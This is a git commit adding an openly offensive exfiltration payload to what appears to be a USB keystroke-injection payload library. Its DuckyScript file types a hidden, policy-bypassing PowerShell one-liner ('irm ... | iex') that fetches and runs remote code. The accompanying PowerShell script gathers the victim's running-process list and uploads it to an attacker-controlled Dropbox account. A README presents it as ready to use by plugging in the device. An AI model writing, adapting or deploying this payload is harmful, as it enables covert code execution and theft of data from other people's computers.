Merge pull request #153 from aleff-github/patch-20

Exfiltrate Process Info
2023-06-12 14:32:56 -04:00 · 2023-06-12 14:32:56 -04:00 · dc411248a6
parent f44711d615 0c984bd819
commit dc411248a6
3 changed files with 98 additions and 0 deletions
--- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/ExfiltrateProcessInfo.ps1
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/ExfiltrateProcessInfo.ps1
@ -0,0 +1,36 @@
+<#
+This function uploads the content of a file called "tasklist_output.txt" to Dropbox using Dropbox API.
+
+Firstly, a temporary file is created using the New-TemporaryFile cmdlet of PowerShell.
+
+Then, the tasklist /v command is used to get the running processes output on the computer.
+
+The output is then written to the temporary file using the Out-File cmdlet.
+
+The Dropbox API endpoint for uploading a file is set, and the API parameters such as the destination path of the file on Dropbox and access credentials are specified.
+
+Finally, the Invoke-RestMethod cmdlet of PowerShell is used to send an HTTP POST request to the Dropbox API and upload the file.
+#>
+function ExfiltrateProcessInfo {
+	$localFilePath = New-TemporaryFile
+	$taskListOutput = tasklist /v
+	$taskListOutput | Out-File -FilePath $localFilePath
+	$dropboxFilePath = "/tasklist_output.txt"
+
+	# Required - Set here your Dropbox Token
+	$accessToken = "example.com"
+	$authHeader = @{Authorization = "Bearer $accessToken"}
+
+	$fileContent = Get-Content $localFilePath
+
+	$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
+
+	$headers = @{}
+	$headers.Add("Authorization", "Bearer $accessToken")
+	$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
+	$headers.Add("Content-Type", "application/octet-stream")
+
+	Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent
+}
+
+ExfiltrateProcessInfo
--- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md
@ -0,0 +1,36 @@
+# Exfiltrate Process Info - Windows ✅
+
+A script used to exfiltrate process info.
+
+**Category**: Exfiltration
+
+## Description
+
+A script used to exfiltrate process info.
+
+This function uploads the content of a file called "tasklist_output.txt" to Dropbox using Dropbox API.
+
+Firstly, a temporary file is created using the New-TemporaryFile cmdlet of PowerShell.
+
+Then, the tasklist /v command is used to get the running processes output on the computer.
+
+The output is then written to the temporary file using the Out-File cmdlet.
+
+The Dropbox API endpoint for uploading a file is set, and the API parameters such as the destination path of the file on Dropbox and access credentials are specified.
+
+Finally, the Invoke-RestMethod cmdlet of PowerShell is used to send an HTTP POST request to the Dropbox API and upload the file.
+
+## Getting Started
+
+### Dependencies
+
+* An internet connection
+* Windows 10,11
+
+### Executing program
+
+* Plug in your device
+
+### Settings
+
+* Dropbox Webhook
--- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
@ -0,0 +1,26 @@
+REM ##########################################
+REM #                                        |
+REM # Title        : Exfiltrate Process Info |
+REM # Author       : Aleff                   |
+REM # Version      : 1.0                     |
+REM # Category     : Exfiltration            |
+REM # Target       : Windows 10-11           |
+REM #                                        |
+REM ##########################################
+
+REM Requirements:
+REM     - Internet Connection
+REM     - Dropbox Webhook
+
+REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
+DEFINE PAYLOAD example.com
+
+
+DELAY 2000
+GUI r
+DELAY 250
+DELETE
+STRING powershell -w h -ep bypass irm 
+STRING PAYLOAD 
+STRING | iex
+ENTER